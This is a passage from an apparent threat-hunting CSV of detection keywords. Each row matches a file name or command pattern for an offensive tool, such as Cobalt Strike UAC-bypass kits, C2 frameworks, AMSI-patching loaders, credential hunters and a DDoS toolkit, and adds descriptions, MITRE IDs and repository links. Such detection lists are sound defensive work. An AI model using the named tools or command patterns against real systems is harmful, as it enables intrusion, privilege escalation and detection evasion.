T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"*Tylous/SourcePoint*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" 
+"*TypeError/domained*","offensive_tool_keyword","domained","A domain name enumeration tool","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/TypeError/domained","1","1","N/A","N/A","8","719","164","2021-04-11T09:54:50Z","2017-08-18T00:03:39Z" +"*U2hlbGxjb2RlIFBhdGg=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*U2VhdGJlbHQuZXhl*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" 
+"*U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*uac fodhelper *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*uac sdclt *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*uac_bypass*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*uac_easinvoker.*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*UACBypass -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*UAC-bypass*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1","1","0","N/A","N/A",,"N/A",,, +"*uacbypass_files*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*UACBypass-BOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" +"*UACBypassedService.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" +"*uacm4gic*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - 
TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*UACME-master*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*uac-schtasks *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*uac-schtasks*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary 
in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*uac-silentcleanup*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*uac-token-duplication*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*UACTokenManipulationManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*uaf2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*uberfile --lhost* --lport * --target-os * --downloader *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*UCCAPI/16.0.13328.20130 OC/16.0.13426.20234*","greyware_tool_keyword","lyncsmash","default user agent used by lyncsmash.py - a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","greyware_tools high risks of false positives","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*udmp-parser-main*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" +"*UDVC-Server.exe -c * -i 127.0.0.1*","offensive_tool_keyword","UniversalDVC","run an executable (UDVC-Server.exe) that sets up a communication channel for redirecting an SSF port using a DVC server. 
This can be seen as a form of proxy to evade detection or bypass network restrictions.","T1090","TA0005","N/A","N/A","Defense Evasion","https://github.com/earthquake/UniversalDVC","1","0","N/A","N/A","3","242","54","2020-12-07T21:02:23Z","2018-03-09T10:44:29Z" +"*UFONet*","offensive_tool_keyword","UFONet","UFONet - is a free software. P2P and cryptographic -disruptive toolkit- that allows to perform DoS and DDoS attacks. on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet and on the Layer3 (Network) abusing the protocol.","T1498 - T1499 - T1496 - T1497 - T1497","TA0040 - TA0041","N/A","N/A","DDOS","https://github.com/epsylon/ufonet","1","0","N/A","N/A","10","1923","587","2022-11-28T17:28:29Z","2013-06-18T18:11:25Z" +"*UFR5cGUgQW5kIFBPcHRpb25zIFRvbyBsb25nIQ==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*UGF5bG9hZCBOYW1lLCBlLmcuIHdpbmRvd3MvbWV0ZXJwcmV0ZXIvcmV2ZXJzZV90Y3A=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*UGF5bG9hZCBvcHRpb25zLCBlLmcuIExIT1NUPTEuMS4xLjEsTFBPUlQ9ODg2Ng==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*uhttpsharp.*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" +"*uknowsec/TailorScan*","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 
- T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"*UlBDIFNlcnZlciBIb3N0*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*UlBDIFNlcnZlciBQb3J0*","offensive_tool_keyword","C2 related 
tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Ullaakut/Gorsair*","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z" +"*UltraSnaffCore.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 
